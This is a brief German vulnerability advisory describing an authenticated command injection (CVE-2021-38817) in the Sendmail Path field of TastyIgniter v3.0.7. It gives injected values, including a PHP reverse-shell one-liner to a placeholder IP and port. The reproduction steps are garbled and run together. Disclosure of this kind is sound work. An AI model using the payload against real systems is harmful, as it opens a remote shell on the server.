
Remote-OS-Kommandoinjektion im Sendmail-Pfadfeld von TastyIgniter v3.0.7
Authentifizierte Remote-OS-Befehlseinschleusung/Fernausführung von Code im TastyIgniter v3.0.7 Sendmail-Webteil (CVE-2021-38817)
Eine anfällige authentifizierte Remote-OS-Befehlseinschleusung existiert im TastyIgniter v3.0.7 Restaurant-CMS-Sendmail-Konfigurationsmenü der Webanwendung. Der Parameter 'Sendmail Path' wird nicht ordnungsgemäß bereinigt, wie durch den im Feld eingetragenen Befehl /usr/sbin/sendmail -bs angezeigt, und ermöglicht das Einschleusen beliebiger Befehle durch Hinzufügen eines Semikolons und eines zusätzlichen OS-Befehls.
/admin/settings/edit/mail/admin/settings/edit/mailMail-Protokoll die Option Sendmail aus.SendMail Path ein Semikolon und einen beliebigen OS-Befehl hinzu, z. B. /usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'
Matt Kiely (HuskyHacks) und Mike Padrick (Fearless), August 2021
CVE zugewiesen im Okt. 2022 (lmfao)